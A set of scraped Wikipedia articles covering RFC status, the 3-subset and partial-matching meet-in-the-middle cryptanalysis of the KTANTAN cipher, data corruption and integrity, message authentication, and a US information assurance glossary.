SMTP itself is still "current technology", so it is not in "Historic" status.[36]However, sinceBGP version 4has entirely superseded earlier BGP versions, the RFCs describing those earlier versions, such asRFC1267, have been designated historic. Statusunknownis used for some very old RFCs, where it is unclear which status the document would get if it were published today. Some of these RFCs would not be published at all today; an early RFC was often just that: a simple Request for Comments, not intended to specify a protocol, administrative procedure, or anything else for which the RFC series is used today.[37] The general rule is that original authors (or their employers, if their employment conditions so stipulate) retain copyright unless they make an explicit transfer of their rights.[38] An independent body, the IETF Trust, holds the copyright for some RFCs and for all others it is granted a license by the authors that allows it to reproduce RFCs.[39]TheInternet Societyis referenced on many RFCs prior to RFC4714 as the copyright owner, but it transferred its rights to the IETF Trust.[40]
https://en.wikipedia.org/wiki/RFC_(identifier)
The3-subset meet-in-the-middle(hereafter shortenedMITM)attackis a variant of the genericmeet-in-the-middle attack, which is used incryptologyforhashandblock ciphercryptanalysis. The 3-subset variant opens up the possibility to apply MITM attacks on ciphers, where it is not trivial to divide the keybits into two independent key-spaces, as required by the MITM attack. The 3-subset variant relaxes the restriction for the key-spaces to be independent, by moving the intersecting parts of the keyspaces into a subset, which contains the keybits common between the two key-spaces. The original MITM attack was first suggested in an article byDiffieandHellmanin 1977, where they discussed the cryptanalytic properties of DES.[1]They argued that the keysize of DES was too small, and that reapplying DES multiple times with different keys could be a solution to the key-size; however, they advised against using double-DES and suggestedtriple-DESas a minimum, due to MITM attacks (Double-DES is very susceptible to a MITM attack, as DES could easily be split into two subciphers (the first and second DES encryption) with keys independent of one another, thus allowing for a basic MITM attack that reduces the computational complexity from2112(=22×56){\displaystyle 2^{112}(=2^{2\times 56})}to257(=2×256){\displaystyle 2^{57}(=2\times 2^{56})}. Many variations has emerged, since Diffie and Hellman suggested MITM attacks. These variations either makes MITM attacks more effective, or allows them to be used in situations, where the basic variant cannot. The 3-subset variant was shown by Bogdanov and Rechberger in 2011,[2]and has shown its use in cryptanalysis of ciphers, such as the lightweight block-cipher family KTANTAN. As with general MITM attacks, the attack is split into two phases: A key-reducing phase and a key-verification phase. In the first phase, the domain of key-candidates is reduced, by applying the MITM attack. In the second phase, the found key-candidates are tested on another plain-/ciphertext pair to filter away the wrong key(s). In the key-reducing phase, the attacked cipher is split into two subciphers,f{\displaystyle f}andg{\displaystyle g}, with each their independent keybits, as is normal with MITM attacks. Instead of having to conform to the limitation that the keybits of the two subciphers should be independent, the 3-subset attack allows for splitting the cipher into two subciphers, where some of the bits are allowed to be used in both of the subciphers. This is done by splitting the key into three subsets instead, namely: To now carry out the MITM attack, the 3 subsets are bruteforced individually, according to the procedure below: Each key-candidate found in the key-reducing phase, is now tested with another plain-/ciphertext pair. This is done simply by seeing if the encryption of the plaintext, P, yields the known ciphertext, C. Usually only a few other pairs are needed here, which makes the 3-subset MITM attack, have a very little data complexity. The following example is based on the attack done by Rechberger and Bogdanov on the KTANTAN cipher-family. The naming-conventions used in their paper is also used for this example. The attack reduces the computational complexity of KTANTAN32 to275.170{\displaystyle 2^{75.170}}, down from280{\displaystyle 2^{80}}if compared with a bruteforce attack. A computational complexity of275.170{\displaystyle 2^{75.170}}is of 2014 still not practical to break, and the attack is thus not computationally feasible as of now. The same goes for KTANTAN48 and KTANTAN64, which complexities can be seen at the end of the example. The attack is possible, due to weaknesses exploited in KTANTAN's bit-wise key-schedule. It is applicable to both KTANTAN32, KTANTAN48 and KTANTAN64, since all the variations uses the same key-schedule. It is not applicable to the related KANTAN family of block-ciphers, due to the variations in the key-schedule between KTANTAN and KANTAN. KTANTAN is a lightweight block-cipher, meant for constrained platforms such asRFIDtags, where a cryptographic primitive such asAES, would be either impossible (given the hardware) or too expensive to implement. It was invented by Canniere, Dunkelman and Knezevic in 2009.[3]It takes a block size of either 32, 48 or 64 bits, and encrypts it using an 80-bit key over 254 rounds. Each round utilizes two bits of the key (selected by thekey schedule) as round key. In preparation to the attack, weaknesses in the key schedule of KTANTAN that allows the 3-subset MITM attack was identified. Since only two key-bits are used each round, the diffusion of the key per round is small - the safety lies in the number of rounds. Due to this structure of the key-schedule, it was possible to find a large number of consecutive rounds, which never utilized certain key-bits. More precisely, the authors of the attack found that: This characteristics of the key-schedule is used for staging the 3-subset MITM attack, as we now are able to split the cipher into two blocks with independent key-bits. The parameters for the attack are thus: One may notice a problem with step 1.3 in the key-reducing phase. It is not possible to directly compare the values ofi{\displaystyle i}andj{\displaystyle j}, asi{\displaystyle i}is calculated at the end of round 111, andj{\displaystyle j}is calculated at the start of round 131. This is mitigated by another MITM technique calledpartial-matching. The authors found by calculating forwards from the intermediate valuei{\displaystyle i}, and backwards from the intermediate valuej{\displaystyle j}that at round 127, 8 bits was still unchanged in bothi{\displaystyle i}andj{\displaystyle j}with a probability one. They thus only compared part of the state, by comparing those 8 bits (It was 8 bits at round 127 for KTANTAN32. It was 10 bits at round 123 and 47 bits at round 131 for KTANTAN48 and KTANTAN64, respectively). Doing this yields more false positives, but nothing that increases the complexity of the attack noticeably. KTANTAN32 requires on average 2 pairs now to find the key-candidate, due to the false positives from only matching on part of the state of the intermediate values. KTANTAN48 and KTANTAN64 on average still only requires one plain-/ciphertext pair to test and find the correct key-candidates. For: The results are taken from the article by Rechberger and Bogdanov. This is not the best attack on KTANTAN anymore. The best attack as of 2011 is contributed to Wei, Rechberger, Guo, Wu, Wang and Ling which improved upon the MITM attack on the KTANTAN family.[4]They arrived at a computational complexity of272.9{\displaystyle 2^{72.9}}with 4 chosen plain-/ciphertext pairs using indirect partial-matching and splice & cut MITM techniques.
https://en.wikipedia.org/wiki/3-subset_meet-in-the-middle_attack
Partial-matchingis a technique that can be used with aMITM attack. Partial-matching is where the intermediate values of the MITM attack,i{\displaystyle i}andj{\displaystyle j}, computed from the plaintext and ciphertext, are matched on only a few select bits, instead of on the complete state. A limitation with MITM attacks is the amount of intermediate values that needs to be stored. In order to compare the intermediate valuesi{\displaystyle i}andj{\displaystyle j}, alli{\displaystyle i}'s need to be computed and stored first, before each computedj{\displaystyle j}can be compared against them. If the two subciphers identified by the MITM attack both has a sufficiently large subkey, then an unfeasible amount of intermediate values need to be stored. While there are techniques such as cycle detection algorithms[1]that allows one to perform a MITM attack without storing either all values ofi{\displaystyle i}orj{\displaystyle j}, these techniques requires that the subciphers of the MITM attack are symmetric. Thus it is a solution that allows one to perform a MITM attack in a situation, where the subkeys are of a cardinality just large enough to make the amount of temporary values that need to be stored infeasible. While this allows one to store more temporary values, its use is still limited, as it only allows one to perform a MITM attack on a subcipher with a few more bits. As an example: If only 1/8 of the intermediate value is stored, then the subkey needs only be 3 bits larger, before the same amount of memory is required anyway, since2−3=1/8{\displaystyle 2^{-3}=1/8} A in most cases far more useful feature provided by partial-matching in MITM attacks, is the ability to compare intermediate values computed at different rounds in the attacked cipher. If the diffusion in each round of the cipher is low enough, it might be possible over a span of rounds to find bits in the intermediate states that has not changed with a probability of 1. These bits in the intermediate states can still be compared. The disadvantage for both of these uses, is that there will be more false positives for key candidates, which needs to be tested. As a rule, the chance for a false positive is given by the probability2−|i|{\displaystyle 2^{-|i|}}, where|i|{\displaystyle |i|}is the amount of matched bits. For a step-by-step example of the complete attack on KTANTAN,[2]see the example on the3-subset MITMpage. This example only deals with the part that needs partial-matching.What is useful to know is that KTANTAN is a 254-round blockcipher, where each round uses 2 bits from the 80-bit key. In the 3-subset attack on the KTANTAN family of ciphers, it was necessary to utilize partial-matching in order to stage the attack. Partial-matching was needed, because the intermediate values of the plain- and ciphertext in the MITM attack, were computed at the end of round 111 and at the start of round 131, respectively. Since they had a span of 20 rounds between them, they could not be compared directly. The authors of the attack, however, identified some useful characteristics of KTANTAN that held with a probability of 1. Due to the low diffusion per round in KTANTAN (the security is in the number of rounds), they found out by computing forwards from round 111 and backwards from round 131 that at round 127, 8 bits from both intermediate states would remain unchanged. (It was 8 bits at round 127 for KTANTAN32. It was 10 bits at round 123 and 47 bits at round 131 for KTANTAN48 and KTANTAN64, respectively). by only comparing the 8 bits of each intermediate value, the authors was able to orchestrate a MITM attack on the cipher, despite there being 20 rounds between the two subciphers. Using partial-matching increased the amount of false positives, but nothing that noticeably increased the complexity of the attack.
https://en.wikipedia.org/wiki/Partial-matching_meet-in-the-middle_attack
Data corruptionrefers to errors incomputer datathat occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-enddata integrity, or lack of errors. In general, when data corruption occurs, afilecontaining that data will produce unexpected results when accessed by the system or the related application. Results could range from a minor loss of data to a system crash. For example, if adocument fileis corrupted, when a person tries to open that file with a document editor they may get anerror message, thus the file might not be opened or might open with some of the data corrupted (or in some cases, completely corrupted, leaving the document unintelligible). The adjacent image is a corrupted image file in which most of the information has been lost. Some types ofmalwaremay intentionally corrupt files as part of theirpayloads, usually by overwriting them with inoperative or garbage code, while a non-malicious virus may also unintentionally corrupt files when it accesses them. If a virus ortrojanwith this payload method manages to alter files critical to the running of the computer's operating system software or physical hardware, the entire system may be rendered unusable. Some programs can give a suggestion to repair the file automatically (after the error), and some programs cannot repair it. It depends on the level of corruption, and the built-in functionality of the application to handle the error. There are various causes of the corruption. There are two types of data corruption associated with computer systems: undetected and detected. Undetected data corruption, also known assilent data corruption, results in the most dangerous errors as there is no indication that the data is incorrect. Detected data corruption may be permanent with the loss of data, or may be temporary when some part of the system is able to detect and correct the error; there is no data corruption in the latter case. Data corruption can occur at any level in a system, from the host to the storage medium. Modern systems attempt to detect corruption at many layers and then recover or correct the corruption; this is almost always successful but very rarely the information arriving in the systems memory is corrupted and can cause unpredictable results. Data corruption during transmission has a variety of causes. Interruption of data transmission causesinformation loss. Environmental conditions can interfere with data transmission, especially when dealing with wireless transmission methods. Heavy clouds can block satellite transmissions. Wireless networks are susceptible to interference from devices such as microwave ovens. Hardware and software failure are the two main causes fordata loss.Background radiation,head crashes, andagingor wear of the storage device fall into the former category, while software failure typically occurs due tobugsin the code.Cosmic rayscause mostsoft errorsin DRAM.[1] Some errors go unnoticed, without being detected by the disk firmware or the host operating system; these errors are known assilent data corruption.[2] There are many error sources beyond the disk storage subsystem itself. For instance, cables might be slightly loose, the power supply might be unreliable,[3]external vibrations such as a loud sound,[4]the network might introduce undetected corruption,[5]cosmic radiationand many other causes ofsoft memory errors, etc. In 39,000 storage systems that were analyzed, firmware bugs accounted for 5–10% of storage failures.[6]All in all, the error rates as observed by aCERNstudy on silent corruption are far higher than one in every 1016bits.[7]WebshopAmazon.comhas acknowledged similar high data corruption rates in their systems.[8]In 2021, faulty processor cores were identified as an additional cause in publications by Google and Facebook; cores were found to be faulty at a rate of several in thousands of cores.[9][10] One problem is that hard disk drive capacities have increased substantially, but their error rates remain unchanged. The data corruption rate has always been roughly constant in time, meaning that modern disks are not much safer than old disks. In old disks the probability of data corruption was very small because they stored tiny amounts of data. In modern disks the probability is much larger because they store much more data, whilst not being safer. That way, silent data corruption has not been a serious concern while storage devices remained relatively small and slow. In modern times and with the advent of larger drives and very fast RAID setups, users are capable of transferring 1016bits in a reasonably short time, thus easily reaching the data corruption thresholds.[11] As an example,ZFScreator Jeff Bonwick stated that the fast database atGreenplum, which is a database software company specializing in large-scale data warehousing and analytics, faces silent corruption every 15 minutes.[12]As another example, a real-life study performed byNetAppon more than 1.5 million HDDs over 41 months found more than 400,000 silent data corruptions, out of which more than 30,000 were not detected by the hardware RAID controller (only detected duringscrubbing).[13]Another study, performed byCERNover six months and involving about 97petabytesof data, found that about 128megabytesof data became permanently corrupted silently somewhere in the pathway from network to disk.[14] Silent data corruption may result incascading failures, in which the system may run for a period of time with undetected initial error causing increasingly more problems until it is ultimately detected.[15]For example, a failure affecting file systemmetadatacan result in multiple files being partially damaged or made completely inaccessible as the file system is used in its corrupted state. When data corruption behaves as aPoisson process, where eachbitof data has an independently low probability of being changed, data corruption can generally be detected by the use ofchecksums, and can often becorrectedby the use oferror correcting codes(ECC). If an uncorrectable data corruption is detected, procedures such as automatic retransmission or restoration frombackupscan be applied. Certain levels ofRAIDdisk arrays have the ability to store and evaluateparity bitsfor data across a set of hard disks and can reconstruct corrupted data upon the failure of a single or multiple disks, depending on the level of RAID implemented. SomeCPUarchitectures employ various transparent checks to detect and mitigate data corruption inCPU caches,CPU buffersandinstruction pipelines; an example isIntel Instruction Replaytechnology, which is available onIntel Itaniumprocessors.[16] Many errors are detected and corrected by the hard disk drives using the ECC codes[17]which are stored on disk for each sector. If the disk drive detects multiple read errors on a sector it may make a copy of the failing sector on another part of the disk, by remapping the failed sector of the disk to a spare sector without the involvement of the operating system (though this may be delayed until the next write to the sector). This "silent correction" can be monitored usingS.M.A.R.T.and tools available for most operating systems to automatically check the disk drive for impending failures by watching for deteriorating SMART parameters. Somefile systems, such asBtrfs,HAMMER,ReFS, andZFS, use internal data andmetadatachecksumming to detect silent data corruption. In addition, if a corruption is detected and the file system uses integrated RAID mechanisms that providedata redundancy, such file systems can also reconstruct corrupted data in a transparent way.[18]This approach allows improved data integrity protection covering the entire data paths, which is usually known asend-to-end data protection, compared with other data integrity approaches that do not span different layers in the storage stack and allow data corruption to occur while the data passes boundaries between the different layers.[19] Data scrubbingis another method to reduce the likelihood of data corruption, as disk errors are caught and recovered from before multiple errors accumulate and overwhelm the number of parity bits. Instead of parity being checked on each read, the parity is checked during a regular scan of the disk, often done as a low priority background process. The "data scrubbing" operation activates a parity check. If a user simply runs a normal program that reads data from the disk, then the parity would not be checked unless parity-check-on-read was both supported and enabled on the disk subsystem. If appropriate mechanisms are employed to detect and remedy data corruption, data integrity can be maintained. This is particularly important in commercial applications (e.g.banking), where an undetected error could either corrupt a database index or change data to drastically affect an account balance, and in the use ofencryptedorcompresseddata, where a small error can make an extensive dataset unusable.[7]
https://en.wikipedia.org/wiki/End-to-end_data_integrity
Ininformation security,message authenticationordata origin authenticationis a property that a message has not been modified while in transit (data integrity) and that the receiving party can verify the source of the message.[1] Message authentication or data origin authentication is aninformation securityproperty that indicates that a message has not been modified while in transit (data integrity) and that the receiving party can verify the source of the message.[1]Messageauthenticationdoes not necessarily include the property ofnon-repudiation.[2][3] Message authentication is typically achieved by usingmessage authentication codes(MACs),authenticated encryption(AE), ordigital signatures.[2]The message authentication code, also known as digital authenticator, is used as an integrity check based on a secret key shared by two parties to authenticate information transmitted between them.[4]It is based on using acryptographic hashorsymmetric encryption algorithm.[5]The authentication key is only shared by exactly two parties (e.g. communicating devices), and the authentication will fail in the existence of a third party possessing the key since thealgorithmwill no longer be able to detectforgeries(i.e. to be able to validate the unique source of the message).[6]In addition, the key must also be randomly generated to avoid its recovery through brute-force searches and related-key attacks designed to identify it from the messages transiting the medium.[6] Some cryptographers distinguish between "message authentication without secrecy" systems – which allow the intended receiver to verify the source of the message, but they don't bother hiding the plaintext contents of the message – fromauthenticated encryptionsystems.[7]Some cryptographers have researchedsubliminal channelsystems that send messages that appear to use a "message authentication without secrecy" system, but in fact also transmit a secret message. Data origin authentication and non-repudiation have been also studied in the framework of quantum cryptography.[8][9] This cryptography-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Message_authentication
Committee on National Security SystemsInstruction No. 4009,National Information Assurance Glossary, published by theUnited Statesfederal government, is an unclassifiedglossaryofInformation securityterms intended to provide a common vocabulary for discussingInformation Assuranceconcepts. The glossary was previously published as theNational Information Systems Security Glossary(NSTISSI No. 4009) by the National Security Telecommunications and Information Systems Security Committee (NSTISSC). Under Executive Order (E.O.) 13231 of October 16, 2001,Critical Infrastructure Protectionin theInformation Age, the PresidentGeorge W. Bushredesignated the National Security Telecommunications and Information Systems Security Committee (NSTISSC) as the Committee on National Security Systems (CNSS). The most recent version was revised April 26, 2010.[1]
https://en.wikipedia.org/wiki/National_Information_Assurance_Glossary